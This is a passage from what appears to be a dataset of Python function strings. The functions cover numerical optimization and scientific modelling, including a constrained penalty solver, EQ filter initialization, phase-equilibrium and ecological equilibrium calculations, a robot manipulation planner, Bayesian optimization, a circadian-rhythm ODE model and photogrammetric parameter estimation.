+ (L_lhs.shape[0] - np.sum(cnstr_linear))#(1 - int(cnstr_linear))\n \n print('Iter ', count, '# of violated constr:', len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear)))\n print(' Linear constraints on u violation:', L_lhs.shape[0] - np.sum(cnstr_linear))\n eta[cnstr['Relaxed'] == False] *= eta_step\n eta_lin[cnstr_linear == False] *= eta_step\n # eta_0 *= eta_step*2\n # eta_lin *= eta_step\n \n if num_violated == num_violated_prev:\n print('Increase enforcement')\n if num_violated_lin > 0:\n eta_lin[cnstr_linear == False] *= eta_step\n # eta_0 *= eta_step*2\n #eta_lin *= eta_step\n if num_violated_oar > 0:\n eta[cnstr['Relaxed'] == False] *= eta_step\n # eta_0 *= eta_step*2\n \n u, w_0, w, w_lin, obj_history, relaxed_obj_history = solver(u, eta_0, eta, eta_lin, T, H, L_lhs, L_rhs, alpha, gamma, B, D, C, ftol = ftol, max_iter = max_iter, verbose = verbose, nnls_max_iter=nnls_max_iter)\n # solver(u, eta_0, eta, T, H, alpha, gamma, B, D, C, ftol = ftol, max_iter = max_iter, verbose = verbose)\n auto_param_obj_history.append(obj_history)\n auto_param_relaxed_obj_history.append(relaxed_obj_history)\n cnstr = constraints_all(u, H, gamma, D, C, tol = 0.05, verbose = 0)\n cnstr_linear = linear_constraint(u, L_lhs, L_rhs, tol = 0.05)\n \n print('Enforcing Optimality')\n count = 0\n while not (len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear))):\n # (cnstr['Relaxed'].sum()-len(H)): #If nothing is violated -- enforce optimality!\n count += 1\n print('Opt Iter', count)\n obj_prev = obj_u_opt_N_fixed(u, T, alpha, B)\n u_prev = np.copy(u)\n eta_0 *= eta_step_tumor\n print('Current eta_0:', eta_0)\n if (2*eta_0)**2 <= 1e-80:\n print('zero reached')\n break\n # u, w_0, w, w_lin, obj_history, relaxed_obj_history = solver(u, eta_0, eta, T, H, alpha, gamma, B, D, C, ftol = ftol, max_iter = max_iter, verbose = verbose)\n u, w_0, w, w_lin, obj_history, relaxed_obj_history = solver(u, eta_0, eta, eta_lin, T, H, L_lhs, L_rhs, alpha, gamma, B, D, C, ftol = ftol, max_iter = max_iter//2, verbose = verbose, nnls_max_iter=nnls_max_iter)\n auto_param_obj_history.append(obj_history)\n auto_param_relaxed_obj_history.append(relaxed_obj_history)\n \n obj_new = obj_u_opt_N_fixed(u, T, alpha, B)\n if (abs(obj_new - obj_prev)/abs(obj_prev) <= 1e-4) or (obj_new > obj_prev): #two consequent iters, two times bc on iter 2 it stops anyway\n print('No improvement, increase enforcement')\n eta_step_tumor *= 0.1\n eta_0 *= eta_step_tumor\n if (2*eta_0)**2 <= 1e-80:\n print('zero reached')\n break\n # break\n \n cnstr = constraints_all(u, H, gamma, D, C, tol = 0.05, verbose = 0)\n cnstr_linear = linear_constraint(u, L_lhs, L_rhs, tol = 0.05)\n print('# of violated constr:', len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear)))#(1 - int(cnstr_linear)))\n \n print('Finding the correct solution:')\n u = u_prev\n eta_0 = eta_0/eta_step_tumor\n \n cnstr = constraints_all(u, H, gamma, D, C, tol = 0.05, verbose = 0)\n cnstr_linear = linear_constraint(u, L_lhs, L_rhs, tol = 0.05)\n print('# of violated constr:', len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear)))\n # print('# of violated constr:', cnstr['Relaxed'].sum()-len(H))\n print(\"OBJJJJJ:\", obj_u_opt_N_fixed(u, T, alpha, B))\n return u, w_0, w, w_lin, eta_0, eta, eta_lin, auto_param_obj_history, auto_param_relaxed_obj_history", "def _init_optimizer_params(self):\n order = [\n [Peaking.__name__, True, True], # Peaking\n [LowShelf.__name__, True, True], # Low shelfs\n [HighShelf.__name__, True, 
True], # High shelfs\n [Peaking.__name__, True, False], # Peaking with fixed q\n [LowShelf.__name__, True, False], # Low shelfs with fixed q\n [HighShelf.__name__, True, False], # High shelfs with fixed q\n [Peaking.__name__, False, True], # Peaking with fixed fc\n [LowShelf.__name__, False, True], # Low shelfs with fixed fc\n [HighShelf.__name__, False, True], # High shelfs with fixed fc\n [Peaking.__name__, False, False], # Peaking with fixed fc and q\n [LowShelf.__name__, False, False], # Low shelfs with fixed fc and q\n [HighShelf.__name__, False, False], # High shelfs with fixed fc and q\n ]\n\n def init_order(filter_ix):\n filt = self.filters[filter_ix]\n ix = order.index([filt.__class__.__name__, filt.optimize_fc, filt.optimize_q])\n val = ix * 100\n if filt.optimize_fc:\n val += 1 / np.log2(filt.max_fc / filt.min_fc)\n return val\n\n # Initialize filter params as list of empty lists, one per filter\n filter_params = [[]] * len(self.filters)\n # Indexes to self.filters sorted by filter init order\n filter_argsort = sorted(list(range(len(self.filters))), key=init_order, reverse=True)\n remaining_target = self.target.copy()\n for ix in filter_argsort: # Iterate sorted filter indexes\n filt = self.filters[ix] # Get filter\n filter_params[ix] = filt.init(remaining_target) # Init filter and place params to list of lists\n remaining_target -= filt.fr # Adjust target\n filter_params = np.concatenate(filter_params).flatten() # Flatten params list\n return filter_params", "def phase_equilibrium_calculation(s, p, g_x_func, Z_0, k=None, P=None, T=None, \n tol=1e-9, Print_Results=False, Plot_Results=False):\n # Calculate first minimizer\n from tgo import tgo\n if True: # Print time\n import timeit\n A = timeit.time.time()\n \n s.update_state(s, p, P=P, T=T, X = Z_0, Force_Update=True) \n s = dual_equal(s, p, g_x_func, Z_0 , tol=tol)\n X_I = s.m['Z_eq']\n Lambda_d = s.m['Lambda_d']\n \n # Find phase of eq. point I\n s.update_state(s, p, X = X_I, Force_Update=True) \n s.m['Phase eq. I'] = g_x_func(s, p).m['g_mix']['ph min']\n\n # Calculate second minimizer\n Bounds = []\n for i in range(len(Z_0)):\n if Z_0[i] <= X_I[i]:\n Bounds.append((1e-6, Z_0[i]))\n if Z_0[i] > X_I[i]:\n Bounds.append((Z_0[i], 0.99999))\n\n # Calculate second point from redifined gobal func. \n Args = (g_x_func, Lambda_d, X_I, s, p, ['All'])\n print Bounds\n X_II = tgo(eq_sol, Bounds, args=Args, n=100, k_t = 5)\n \n # Find phase of eq. point II\n s.update_state(s, p, X = X_II, Force_Update=True) \n s.m['Phase eq. II'] = g_x_func(s, p).m['g_mix']['ph min']\n \n \n if True: \n B = timeit.time.time()\n print 'Total calculation time = {}'.format(B - A)\n \n if Print_Results:\n print 'EQUILIBRIUM SOLUTIONS I: {} (phase = {})'.format(X_I, \n s.m['Phase eq. I'])\n print ' II: {} (phase = {})'.format(X_II, \n s.m['Phase eq. II']) \n \n if Plot_Results:\n Z_0 = s.m['Z_eq']\n\n # Gibbs mix func with Tie lines\n from scipy import linspace\n print 'Feeding Lamda_d = {} to ep. 
func.'.format(s.m['Lambda_d'])\n print [[X_II, X_I]]\n if p.m['n'] == 2: # Plot binary tie lines\n plot.plot_g_mix(s, p, g_x_func, Tie =[[X_II, X_I]], x_r=1000)\n \n if p.m['n'] == 3: # Plot ternary tie lines\n s.update_state(s, p, P=P, T=T, X = X_I, Force_Update=True) \n G_P = g_x_func(s, p).m['g_mix']['t']\n print G_P\n Tie = [[G_P,# -0.3247905329, # G_P # TODO\n X_I[0], # x_1\n s.m['Lambda_d'][0], # lambda_1\n X_I[1], # x_2\n s.m['Lambda_d'][1]] # lambda_2\n ] \n s.m['Lambda_d']\n plot.plot_g_mix(s, p, g_x_func, Tie = Tie, x_r=100)\n \n # Error func\n s.m['Lambda_d'] = Lambda_d \n s.m['Z_eq'] = X_I\n X_r = linspace(1e-5, 0.9999, 1000) \n plot.plot_ep(eq_sol, X_r, s, p, args=Args)\n\n # Save returns in state dictionary.\n s.m['X_I'] = X_I\n s.m['X_II'] = X_II\n \n return s", "def construct_equilibrium(params,par_dict,K_RC,K_CP,m_P):\n #intrapopulation parameters\n q1=par_dict['q1']\n q2=par_dict['q2']\n q1_0 = params['q10']\n q20 = params['q20']\n hC0 = params['hC0']\n hP0 = params['hP0']\n \n K=par_dict['K']\n r=par_dict['r']\n \n m_C = K_CP*m_P\n\n #interpopulation parameters\n a1=par_dict['a1']\n a2=par_dict['a2']\n a3=par_dict['a3']\n t_hc = par_dict['t_hc']\n t_hp = par_dict['t_hp']\n e1=params['e1']\n e2=params['e2']\n e3=params['e3']\n \n\n # Equilibrium values\n ##Sc2\n ###L-V\n R_eq_s2 , C_eq_s2 = set_R_C_eq_sLV(r,K,q1,a1,e1)\n ###R-M\n R_eq_s2RM, C_eq_s2RM = set_R_C_eq_sRM(r,K,q1,q1_0,a1,e1,hC0)\n ##Sc3\n ###L-V\n R_eq_s3,P_eq_s3 = set_R_C_eq_sLV(r,K,q2,a2,e2)\n ###R-M\n R_eq_s3RM , P_eq_s3RM = set_R_C_eq_sRM(r,K,q2,q20,a2,e2,hP0)\n \n\n ###full system ( need to correct this.. in case want to use it, focus at the moment in invasibility stuff)\n R_eq = set_R_eq(K,q1,q2,r,a1,a2,a3,e1,e2,e3)\n C_eq = set_C_eq(K,q1,q2,r,a1,a2,a3,e1,e2,e3)\n P_eq = set_P_eq(K,q1,q2,r,a1,a2,a3,e1,e2,e3)\n \n D = setD(K,a1,a2,a3,e1,e2,e3,r)\n DBound= setDBound(K,a1,a2,a3,e1,e2,e3,m_C,r)\n\n #Roots for Req\n R1 = setRoot1(K,q1,q2,r,a1,a2,a3,e1,e2,e3,t_hc,t_hp,m_P,m_C,q20,q1_0,hC0,hP0)\n Dis = setDis(K,q1,q2,r,a1,a2,a3,e1,e2,e3,t_hc,t_hp,m_P,m_C,q20,q1_0,hC0,hP0)\n bR = setb_R(K,q1,q2,r,a1,a2,a3,e1,e2,e3,t_hc,t_hp,m_P,m_C,q20,q1_0,hC0,hP0)\n denR = setden_R(K,q1,q2,r,a1,a2,a3,e1,e2,e3,t_hc,t_hp,m_P,m_C,q20,q1_0,hC0,hP0)\n\n R2 = (bR + sqrt(Dis))/(2*denR)\n R3 = (bR - sqrt(Dis))/(2*denR)\n \n eq_dict={'R_eq_s2':R_eq_s2,'C_eq_s2':C_eq_s2,'R_eq_s3':R_eq_s3,'P_eq_s3':P_eq_s3,'R_eq':R_eq,'C_eq':C_eq,'P_eq':P_eq,\n 'R_eq_s2RM':R_eq_s2RM,'C_eq_s2RM':C_eq_s2RM,'R_eq_s3RM':R_eq_s3RM,'P_eq_s3RM':P_eq_s3RM,'R1':R1,'Discriminant':Dis,'R2':R2,'R3':R3,'bR':bR,'denR':denR,'D' : D,'DBound':DBound}\n return eq_dict", "def Optimizer(r_grasp,PAM_r, PAM_s, object_s, object_f, object_params, phi, r_max, walls, obstacles, obstacles_PAM, current_leg, n, n_p, v_max, force_max, legs, dt):\n global action_push_pull, PAM_goal, grasping_goal, object_path_planned, PAM_path_planned\n # assigning cost of changing from one leg to another based on the distance to the desired pose\n cost_ChangeLeg = 1\n dz_final = np.sqrt((object_s.x - object_f.x) ** 2 + (object_s.y - object_f.y) ** 2)\n if dz_final < 1:\n cost_ChangeLeg = 10\n elif dz_final < 2:\n cost_ChangeLeg = 20\n else:\n cost_ChangeLeg = 10\n\n # assigning weight for cost of predicted repositioning and cost of robot motion\n w_cost_reposition = 40\n w_cost_motion = 10\n\n # finding object's leg cordinates\n object_leg = find_corners(object_s.x, object_s.y, object_s.phi, object_params[7], object_params[8])\n\n # initialization (initializeing cost to infinity)\n cost = 
[float('inf'), float('inf'), float('inf'), float('inf')]\n cost_legchange = [0, 0, 0, 0]\n cost_PAM = [[0, 0],[0, 0],[0, 0],[0, 0]]\n cost_manipulation = [0, 0, 0, 0]\n cost_motion = [0, 0, 0, 0]\n force = [0, 0, 0, 0]\n path = [[[], []], [[], []], [[], []], [[], []]]\n planned_path_w = [[],[],[],[]]\n PAM_g = [[[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]]]\n command = [[], [], [], []]\n des = [[], [], [], [], []]\n PAM_goal = state()\n\n # find the nominal trajectory for manipulation\n theta = nominal_traj([object_s.x,object_s.y,object_s.phi], [object_f.x,object_f.y,object_f.phi], v_max, walls, obstacles, n, dt)\n\n # itterate through each leg to find the leg with minimum cost\n for leg in range(4):\n phi_linear = theta\n psi_linear = [theta[k] + phi[leg] for k in range(len(theta))]\n \t# find the cost and required force for manipulation for the leg\n force[leg], cost_manipulation[leg], planned_path_w[leg], command[leg], des= OptTraj([object_s.x, object_s.y, object_s.phi, object_s.xdot, object_s.ydot, object_s.phidot], [object_f.x, object_f.y, object_f.phi, object_f.xdot, object_f.ydot, object_f.phidot], v_max, walls, obstacles, object_params[0:4], object_params[4:7], phi_linear, psi_linear, force_max, r_max[leg], n, dt, object_leg[leg])\n \t# adding cost of changing leg\n if leg != current_leg:\n cost_legchange[leg] = cost_ChangeLeg\n # adding cost of PAM motion to PAM goal pose\n phi0 = np.arctan2(object_leg[leg][1]-object_s.y,object_leg[leg][0]-object_s.x)\n # finding the better option between pulling and pushing for each leg, with the same manipulation plan\n for push_pull in [0,1]:\n PAM_g[leg][push_pull] = [r_grasp * np.cos(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][0], r_grasp * np.sin(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][1], np.pi * push_pull + phi0]\n cost_PAM[leg][push_pull], path[leg][push_pull], command_pam, goal_orientation = OptPath([PAM_s.x, PAM_s.y, PAM_s.phi], PAM_g[leg][push_pull], walls, obstacles_PAM, n_p, dt)\n if cost_PAM[leg][push_pull]!= float(\"inf\"):\n PAM_s_sim = copy.deepcopy(PAM_s)\n PAM_s_sim.x, PAM_s_sim.y, PAM_s_sim.phi = [PAM_r * np.cos(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][0], PAM_r * np.sin(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][1], np.pi * push_pull + phi0]\n # adding cost of predicted re-positionings\n n_transition = traj_simulation(copy.deepcopy(PAM_s_sim), copy.deepcopy(object_s), force[leg], legs, leg, command[leg])\n # print(n_transition)\n cost_PAM[leg][push_pull] += w_cost_reposition*n_transition\n cost_motion[leg] += min(cost_PAM[leg])*w_cost_motion\n action_push_pull[leg] = np.argmin(cost_PAM[leg])\n else:\n phi0 = np.arctan2(force[leg][0][1], force[leg][0][0])\n for push_pull in [0,1]:\n PAM_g[leg][push_pull] = [r_grasp * np.cos(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][0], r_grasp * np.sin(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][1], np.pi * push_pull + phi0]\n cost = [cost_legchange[leg] + cost_motion[leg] + cost_manipulation[leg] for leg in range(4)]\n\n if min(cost) < float(\"inf\"):\n \t[min_index, min_value] = [np.argmin(cost), min(cost)]\n \t# Finding the grasping goal pose based on the selected plan\n \tphi0 = np.arctan2(object_leg[min_index][1]-object_s.y,object_leg[min_index][0]-object_s.x)\n \tgrasping_goal = [PAM_r * np.cos(phi0) * np.sign(action_push_pull[min_index] * 2 - 1) + object_leg[min_index][0], PAM_r * np.sin(phi0) * np.sign(action_push_pull[min_index] * 2 - 1) + object_leg[min_index][1], np.pi * 
action_push_pull[min_index] + phi0]\n \tPAM_goal = state()\n \tPAM_goal.x, PAM_goal.y, PAM_goal.phi = PAM_g[min_index][action_push_pull[min_index]]\n \tobject_path_planned = Path()\n \tobject_path_planned.header.frame_id = 'frame_0'\n \tfor i in range(len(planned_path_w[min_index])):\n \t\tpose = PoseStamped()\n \t\tpose.pose.position.x = planned_path_w[min_index][i][0]\n \t\tpose.pose.position.y = planned_path_w[min_index][i][1]\n \t\tpose.pose.position.z = 0\n \t\tobject_path_planned.poses.append(pose)\n\n \tPAM_path_planned = Path()\n \tPAM_path_planned.header.frame_id = 'frame_0'\n \tif min_index != current_leg:\n \t\tfor i in range(len(path[min_index][action_push_pull[min_index]])):\n \t\t\tpose = PoseStamped()\n \t\t\tpose.pose.position.x, pose.pose.position.y, pose.pose.orientation.z =path[min_index][action_push_pull[min_index]][i]\n \t\t\tPAM_path_planned.poses.append(pose)\n else:\n \tmin_index = 5\n \tmin_value = float(\"inf\")\n if 0 < min_index and min_index <= 4:\n force_d = force[min_index][0]\n else:\n force_d = [0,0,0]\n\n return cost ,min_index, force_d, PAM_goal, grasping_goal, object_path_planned, PAM_path_planned", "def _core_fix_params(self,bx,phase,eqnid) :\n\t\tif self.ss.exptype == 'fullinfo' :\n\t\t\treturn bx\n\t\telif self.ss.exptype in ('noinfo','partialinfo') :\n\t\t\treg_fix = self._regressors_fix[eqnid] \n\t\t\tif phase == 1 : \n\t\t\t\tprod_fix = reg_fix['prod']\n\t\t\t\tfor varid in prod_fix : \n\t\t\t\t\tbx[varid] = 0.0\n\t\t\telif phase == 2 : \t\t\t\n\t\t\t\tdegrad_fix = reg_fix['degrad']\n\t\t\t\tfor varid in degrad_fix :\n\t\t\t\t\tbx[varid] = 0.0 \n\t\t\telse : \n\t\t\t\tself.logger.error(\"Incorrect phase %r\"%(phase))\n\t\t\t\tsys.exit(1)\n\t\telse :\n\t\t\tself.logger.error(\"Unrecognized exptype %s quitting...\"%\\\n\t\t\t(self.ss.exptype))\n\n\t\treturn bx", "def optimize(self, iterations=1000):\r\n prev = None\r\n finalx = None\r\n finaly = None\r\n while iterations:\r\n maxei, eis = self.acquisition()\r\n new_y = self.f(maxei)\r\n if maxei == prev:\r\n break\r\n self.gp.update(maxei, new_y)\r\n pycodehack = finaly is None or self.minimize and finaly > new_y\r\n if ((pycodehack or not self.minimize and finaly < new_y)):\r\n finaly = new_y\r\n finalx = maxei\r\n prev = maxei\r\n iterations -= 1\r\n return finalx, finaly", "def CircadianRythme(t,initial_conditions) :\n#-----------------------\n# PARAMETERS IMPORTATION\n#-----------------------\n\tfichier = 'param.csv'\n\tparam = readparam(fichier, 1)\n\n#-----------------------\n# Initial conditions : \n#-----------------------\n\n\t# mRNAs of per, Cry and Bmal : \n\tMp = initial_conditions[0]\n\tMc = initial_conditions [1]\n\tMb = initial_conditions[2]\n\n\t# Phosporylated and non-phosphorylated proteins PER\n\t# and Cry in the cytosol : \n\n\tPc = initial_conditions[3]\n\tCc = initial_conditions[4]\n\tPcp = initial_conditions[5]\n\tCcp = initial_conditions[6]\n\n\t# Phosporylated and non-phosphorylated PER- Cry complexe\n\t# in the cytosol and nucleus : \n\n\tPCc = initial_conditions[7]\n\tPcn = initial_conditions[8]\n\tPCcp = initial_conditions[9]\n\tPCnp = initial_conditions[10]\n\n\t# Phosphorylated and non-phosphorylated protein BMAL1 in\n\t# the cytosol and nucleus : \n\n\tBc = initial_conditions[11]\n\tBcp = initial_conditions[12]\n\tBn = initial_conditions[13]\n\tBnp = initial_conditions[14]\n\n\t# Inactive complex between PER-CRY and CLOCK-BMAL1 in \n\t# nucleus : \n\n\tIn = initial_conditions[15]\n\n#--------------\n# Parameters : \n#--------------\n\n\n\t# Rate constants for 
modification : \n\n\tk1 = param['k1']\n\tk2 = param['k2']\n\tk3 = param['k3']\n\tk4 = param['k4']\n\tk5 = param['k5']\n\tk6 = param['k6']\n\tk7 = param['k7']\n\tk8 = param['k8']\n\n\t# Activation constant\n\n\tKAP = param['KAP']\n\tKAC = param['KAC']\n\tKIB = param['KIB']\n\n\t#Nonspecific degradation rate constant\n\n\tkdmb = param['kdmb']\n\tkdmc = param['kdmc']\n\tkdmp = param['kdmp']\n\tkdnc = param['kdnc']\n\tkdn = param['kdn']\n\n\t# Michaelis constant : \n\n\tKd = param['Kd']\n\tKdp = param['Kdp']\n\tKp = param['Kp']\n\tKmB = param['KmB']\n\tKmC = param['KmC']\n\tKmP = param['KmP']\n\n\t#Rate constant for synthesis : \n\n\tkstot = param['kstot']\n\tksB = param['ksB']\n\tksC = param['ksC']\n\tksP = param['ksP']\n\n\t# Degree of cooperativity : \n\n\tn = param['n']\n\tm = param['m']\n\n\t#Phosphorylation rate : \n\n\tVphos = param['Vphos']\n\t#Maximum Rate : \n\n\tV1B = param['V1B']\n\tV1C = param['V1C']\n\tV1P = param['V1P']\n\tV1PC = param['V1PC']\n\tV2B = param['V2B']\n\tV2C = param['V2C']\n\tV2P = param['V2P']\n\tV2PC = param['V2PC']\n\tV3B = param['V3B']\n\tV3PC = param['V3PC']\n\tV4B = param['V4B']\n\tV4PC = param['V4PC']\n\n\t#Maximum rate of degradation\n\n\tvndBC = param['vndBC']\n\tvndBN = param['vndBN']\n\tvndCC = param['vndCC']\n\tvndIN = param['vndIN']\n\tvndPC = param['vndPC']\n\tvndPCC = param['vndPCC']\n\tvndPCN = param['vndPCN']\n\tvnmB = param['vnmB']\n\tvnmC = param['vnmC']\n\tvnmP = param['vnmP']\n\n\t# Maximum rate of synthesis/transcription : \n\n\tvnsTot = param['vnsTot']\n\tvnsB = param['vnsB']\n\tvnsC = param['vnsC']\n\tvnsP = param['vnsP']\n\n#--------------------------\n# Kinetic equations : \n#--------------------------\n\n\t# mRNAs of per, Cry and Bmal : \n\n\tdMp = vnsP * Bn**n/(KAP**n+Bn**n) - vnmP * Mp/(KmP+Mp) - kdmp*Mp\n\tdMc = vnsC * Bn**n/(KAC**n+Bn**n) - vnmC * Mc/(KmC + Mc) - kdmc*Mc\n\tdMb = vnsB * KIB**m/(KIB**m+Bn**m) - vnmB * Mb/(KmB + Mb) - kdmb*Mb\n\n\t#Phosphorylated and non-phosphorylated proteins PER and CRY in the cytosol : \n\n\tdPc = ksP * Mp - V1P*Pc/(Kp+Pc) + V2P * Pcp/(Kdp + Pcp) + k4 * PCc - k3 * Pc * Cc - kdn * Pc\n\tdCc = ksC * Mc - V1C * Cc / (Kp +Cc) + V2C * Ccp/(Kdp + Ccp) + k4 * PCc - k3 * Pc * Cc - kdnc * Cc\n\tdPcp = V1P * Pc/(Kp + Pc) - V2P * Pcp/(Kdp + Pcp) - vndPC * Pcp/(Kp+Pcp) - kdn * Pcp\n\tdCcp = V1C * Cc/(Kp+Cc) - V2C * Ccp/(Kdp + Ccp) - vndCC * Ccp/(Kd + Ccp) - kdn * Ccp\n\n\t# Phosphorylated and non-phosphorylated PER-CRY complex in cytosom and nucleus : \n\n\tdPCc = -V1PC * PCc/(Kp+PCc) + V2PC * PCcp/(Kdp + PCcp) - k4 * PCc + k3 * Pc * Cc + k2 * Pcn - k1 * PCc - kdn * PCc \n\tdPCn = -V3PC * Pcn/(Kp+Pcn) + V4PC * PCnp/(Kdp+PCnp) - k2*Pcn + k1*PCc - k7 * Bn * Pcn + k8 * In - kdn * Pcn\n\tdPCcp = V1PC * PCc/(Kp+PCc) - V2PC * PCcp/(Kdp + PCcp) - vndPCC * PCcp/(Kd + PCcp) - kdn * PCcp\n\tdPCnp = V3PC * Pcn/(Kp+Pcn) - V4PC * PCnp/(Kdp + PCnp) - vndPCN * PCnp/(Kd + PCnp) - kdn * PCnp\n\n\t# Phosphorylated and non-phosphorylated protein BMAL1 in the cytosol and nucleus\n\tdBc = KIB * Mb - V1B * Bc/(Kp+Bc) + V2B * Bcp/(Kdp + Bcp) - k5*Bc + k6*Bc - kdn*Bc\n\tdBcp = V1B * Bc/(Kp + Bc) - V2B * Bcp/(Kdp + Bcp) - vndBC * Bcp/(Kd + Bcp) - kdn*Bcp\n\tdBn = -V3B * Bn/(Kp+Bn) - V4B * Bnp/(Kdp+Bnp) + k5*Bc - k6 * Bn - k7 * Bn * Pcn + k8 * In - kdn*Bn\n\tdBnp = V3B*Bn/(Kp+Bn) - V4B * Bnp/(Kdp + Bnp) - vndBN * Bnp/(Kd + Bnp) - kdn * Bnp\n\n\t#Inactive complex between PER–CRY and CLOCK–BMAL1 in nucleus :\n\tdIn = -k8 * In + k7 * Bn * Pcn -vndIN * In/(Kd + In) - kdn*In\n\t\n\tdydt = np.array([dMp, dMc, dMb, dPc, dCc, dPcp, dCcp, dPCc, 
dPCn, dPCcp, dPCnp, dBc, dBcp, dBn, dBnp, dIn])\n\treturn dydt.reshape(len(dydt),1)", "def __ComputeApproximateVals(self, cameraPoints, groundPoints):\n\n # Find approximate values\n cameraPoints = cameraPoints.reshape(np.size(cameraPoints), 1)\n groundPointsXY = groundPoints[0:2, :].T\n groundPointsXY = groundPointsXY.reshape(np.size(groundPointsXY), 1)\n groundPointsZ = groundPoints[2, :].T\n\n n = int(len(cameraPoints)) # number of observations\n u = 4 # 4 conform parameters\n\n A = np.zeros((n, u)) # A matrix (n,u)\n\n j = 0\n for i in range(len(cameraPoints)):\n if i % 2 == 0:\n A[i, 0] = 1\n A[i, 1] = 0\n A[i, 2] = cameraPoints[j]\n A[i, 3] = cameraPoints[j + 1]\n else:\n A[i, 0] = 0\n A[i, 1] = 1\n A[i, 2] = cameraPoints[j + 1]\n A[i, 3] = -cameraPoints[j]\n j += 2\n\n X = np.dot(la.inv(np.dot(np.transpose(A), A)), np.dot(np.transpose(A), groundPointsXY))\n\n # now we can compute the rest of the params\n X0 = X[0]\n Y0 = X[1]\n kappa = np.arctan2(-X[3], X[2])\n lam = np.sqrt(X[2] ** 2 + X[3] ** 2)\n Z0 = np.average(groundPointsZ) + (lam) * self.camera.focalLength\n\n adjustment_results = {\"X0\": X0[0], \"Y0\": Y0[0], \"Z0\": Z0[0], \"omega\": 0, \"phi\": 0,\n \"kappa\": np.rad2deg(kappa[0])}\n\n self.__exteriorOrientationParameters = np.array(\n [X0[0], Y0[0], Z0[0], 0, 0, kappa[0]]).T # updating the exterior orientation params\n # self.__exteriorOrientationParameters = np.array([202225, 742447, 657.81, 0, 0, kappa[0]]).T\n #return adjustment_results", "def updateW(self, trj_Sp_theta, W_0):\n def fun(x):\n global trj_Sp_theta_z\n #W_0 = [[x[0], x[1]], [x[2], x[3]], [x[4], x[5]], [x[6], x[7]]] # sin cos\n W_0 = [[x[0], x[1]],[x[2], x[3]]] # with dir\n #W_0 = x\n r_0 = self.reward_trj(trj_Sp_theta, W_0) \n return -1*r_0 \n import numpy as np\n from scipy.optimize import minimize\n \n global trj_Sp_theta_z \n trj_Sp_theta_z = trj_Sp_theta\n alpha = 0.005\n alpha = 0.1\n delta = alpha\n cons = ({'type': 'eq',\n 'fun' : lambda x: np.array([np.sum(x)-1])},\n {'type': 'ineq',\n 'fun' : lambda x: np.array([np.min(x)])}, # greater than zero\n {'type': 'ineq',\n 'fun' : lambda x: np.array([-np.abs(x[0]-x0[0])+delta])}, # greater than zero\n {'type': 'ineq',\n 'fun' : lambda x: np.array([-np.abs(x[1]-x0[1])+delta])}, # greater than zero\n {'type': 'ineq',\n 'fun' : lambda x: np.array([-np.abs(x[2]-x0[2])+delta])}, # greater than zero\n {'type': 'ineq',\n 'fun' : lambda x: np.array([-np.abs(x[3]-x0[3])+delta])}) # greater than zero\n\n #x0 = W_0\n x0 = [W_0[0][0], W_0[0][1], W_0[1][0], W_0[1][1]] # with dir\n res = minimize(fun, x0, constraints=cons)\n x = res.x\n W = [[x[0], x[1]],[x[2], x[3]]] # with dir\n return W", "def solve(self):\n\n # Open status display\n fmtstr, nsep = self.display_start()\n\n # Start solve timer\n self.timer.start(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Main optimisation iterations\n for self.k in range(self.k, self.k + self.opt['MaxMainIter']):\n\n # Update record of X and Y from previous iteration\n self.on_iteration_start()\n\n # Compute backtracking\n if self.opt['Backtrack'] is not None and self.k >= 0:\n self.timer.stop('solve_wo_btrack')\n # Compute backtracking\n self.backtrack.update(self)\n self.timer.start('solve_wo_btrack')\n else:\n # Compute just proximal step\n self.xstep()\n # Update by combining previous iterates\n self.ystep()\n\n # Compute residuals and stopping thresholds\n self.timer.stop(['solve_wo_rsdl', 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n frcxd, adapt_tol = self.compute_residuals()\n 
self.timer.start('solve_wo_rsdl')\n\n # Compute and record other iteration statistics and\n # display iteration stats if Verbose option enabled\n self.timer.stop(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n itst = self.iteration_stats(self.k, frcxd)\n self.itstat.append(itst)\n self.display_status(fmtstr, itst)\n self.timer.start(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Call callback function if defined\n if self.opt['Callback'] is not None:\n if self.opt['Callback'](self):\n break\n\n # Stop if residual-based stopping tolerances reached\n if not self.opt['FastSolve']:\n if frcxd < adapt_tol:\n break\n\n # Increment iteration count\n self.k += 1\n\n # Record solve time\n self.timer.stop(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Print final separator string if Verbose option enabled\n self.display_end(nsep)\n\n return self.getmin()", "def LeastSquareParametersFit(self,params0,inclination_data=None):\n\t\tnpl = self.Observations.nplanets\n\t\tif len(params0.reshape(-1)) == npl * 5:\n\t\t\tcoplanar = True\n\t\telif len(params0.reshape(-1)) == npl * 7:\n\t\t\tcoplanar = False\n\t\telse:\n\t\t\tprint(\"Shape of initial parameter does not match what is required for the number of planets!\")\n\t\t\traise\n\t\t\t\n\t\ttarget_data = np.array([])\n\t\terrors = np.array([])\n\t\t\n\t\tfor time,err in zip(self.Observations.transit_times,self.Observations.transit_uncertainties):\n\t\t\ttarget_data = np.append(target_data,time)\n\t\t\terrors = np.append(errors,err)\n\t\t\n\t\ttFinal = self.Observations.tFinal() + np.max(self.Observations.PeriodEstimates)\n\t\t\n\t\tdef objectivefn(x):\n\t\t\t\n\t\t\tif coplanar:\n\t\t\t\ttransits,success = self.MCMC_CoplanarParam_TransitTimes(x,tFinal)\n\t\t\telse:\n\t\t\t\ttransits,success = self.MCMC_Param_TransitTimes(x,tFinal)\n\t\t\tif\tinclination_data:\n\t\t\t\t\tassert not coplanar, 